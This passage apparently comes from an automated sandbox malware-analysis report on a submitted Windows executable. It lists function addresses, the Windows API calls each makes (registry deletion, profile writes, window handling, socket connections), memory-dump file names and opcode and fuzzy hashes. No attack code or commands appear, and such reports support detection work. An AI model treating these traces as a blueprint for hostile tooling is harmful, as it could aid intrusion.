                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 327565842-0
                                                                                                                                                                                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                                                                                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                                                                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2095303065-0
                                                                                                                                                                                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                                                                                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RectWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 861336768-0
                                                                                                                                                                                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                                                                                Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00449598
                                                                                                                                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1856069659-0
                                                                                                                                                                                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                                                                                                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(02E76380,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                                                                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1822080540-0
                                                                                                                                                                                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                                                                Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 659298297-0
                                                                                                                                                                                                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                                                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                                                                                Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(02E71A38,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(02E71A38,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 142311417-0
                                                                                                                                                                                                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                                                                                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                                                                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3087257052-0
                                                                                                                                                                                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                                                                                                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 245547762-0
                                                                                                                                                                                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
